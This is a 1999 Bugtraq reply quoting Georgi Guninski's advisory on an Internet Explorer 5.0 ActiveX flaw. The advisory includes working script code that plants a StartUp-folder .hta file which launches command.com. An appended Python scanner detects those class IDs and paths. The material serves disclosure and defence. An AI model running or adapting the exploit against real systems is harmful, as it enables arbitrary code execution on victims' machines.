[11502] in bugtraq
Re: IE 5.0 allows executing programs
daemon@ATHENA.MIT.EDU (Micheal Patterson)
Tue Aug 24 19:27:40 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <023c01beed2d$4e7cde30$0201a8c0@dredster.ionet.net>
Date: Mon, 23 Aug 1999 01:02:54 -0500
Reply-To: Micheal Patterson <dredster@DREDSTER.IONET.NET>
From: Micheal Patterson <dredster@DREDSTER.IONET.NET>
X-To: Georgi Guninski <joro@NAT.BG>, BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
This apparently works on NT 4.0 sp5 and IE 5.00.2014.0216IC as well..
Micheal Patterson
pattersonm@psi.com
----- Original Message -----
From: Georgi Guninski <joro@NAT.BG>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Saturday, August 21, 1999 11:17 AM
Subject: IE 5.0 allows executing programs
> Disclaimer:
> The opinions expressed in this advisory and program are my own and not
> of any company.
> The usual standard disclaimer applies, especially the fact that Georgi Guninski
> is not liable for any damages caused by direct or indirect use of the
> information or functionality provided by this program.
> Georgi Guninski bears NO responsibility for content or misuse of this
> program or any derivatives thereof.
>
> Description:
>
> Internet Explorer 5.0 under Windows 95/98 (do not know about NT)
> allows executing arbitrary programs on the local machine by creating and
> overwriting local files and putting content in them.
>
> Details:
>
> The problem is the ActiveX Control "Object for constructing type
> libraries for scriptlets".
> It allows creating and overwriting local files and, moreover, putting content
> in them.
> There is some unneeded information in the file, but part of the content
> may be chosen.
> So, an HTML Application file may be created, fed with exploit
> information and written to the StartUp folder.
> The next time the user reboots (which may be forced), the code in the
> HTML Application file will be executed.
> This vulnerability can be exploited via email.
>
> Demonstration is available at: http://www.nat.bg/~joro/scrtlb.html
>
> Workaround:
> Disable Active Scripting
> or
> Disable Run ActiveX Controls and plug-ins
>
> The code is:
>
> <object id="scr"
> classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
> >
> </object>
> <SCRIPT>
> scr.Reset();
> scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
> scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Written by Georgi Guninski http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>";
> scr.write();
> </SCRIPT>
> </object>
>
> Regards,
> Georgi Guninski
> http://www.nat.bg/~joro
>
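
A defensive check built from the identifiers quoted in the advisory above, added here as an example that is not part of either post: it scans an HTML page or mail body for the two class IDs and for a script string that names an .hta file under a StartUp folder. The function name, the path heuristic and the sample inputs are assumptions constructed for illustration.

```python
import html
import re

# Class IDs quoted in the advisory; descriptions follow the advisory's wording.
FLAGGED_CLSIDS = {
    "06290BD5-48AA-11D2-8432-006008C3FBFC":
        "Object for constructing type libraries for scriptlets",
    "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B":
        "object the written file instantiates as 'wsh'",
}

CLSID_RE = re.compile(
    r"clsid\s*:\s*\{?([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\}?", re.I)
# Heuristic (assumption): an .hta path under a StartUp folder, with / or
# single or doubled \ separators as they appear inside script source.
STARTUP_HTA_RE = re.compile(
    r"programs[\\/]+startup[\\/]+[^\"'<>\r\n]*?\.hta\b", re.I)


def scan_message(body):
    """Return sorted (kind, detail) findings for one HTML page or mail body."""
    # Decode character references first so entity-encoded attributes are seen.
    text = html.unescape(body)
    findings = set()
    # Raw-text matching also catches class IDs embedded in script strings,
    # which an HTML tag parser would treat as opaque script data.
    for match in CLSID_RE.finditer(text):
        clsid = match.group(1).upper()
        if clsid in FLAGGED_CLSIDS:
            findings.add(("clsid", clsid))
    for match in STARTUP_HTA_RE.finditer(text):
        findings.add(("startup_hta", match.group(0)))
    return sorted(findings)


# Constructed sample inputs, not captured traffic.
SAMPLES = {
    "flagged_object":
        '<object id="x" classid="CLSID:{06290bd5-48aa-11d2-8432-006008c3fbfc}"></object>',
    "entity_encoded":
        '<object classid="&#99;lsid:06290BD5-48AA-11D2-8432-006008C3FBFC"></object>',
    "startup_path":
        r'<script>o.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\x.hta";</script>',
    "benign":
        '<object classid="clsid:00000000-0000-0000-0000-000000000001"></object>',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, scan_message(body))
```

A hit on either finding kind is a reason to quarantine the message for review; the advisory's own workarounds (disabling Active Scripting or ActiveX controls) remain the preventive measure.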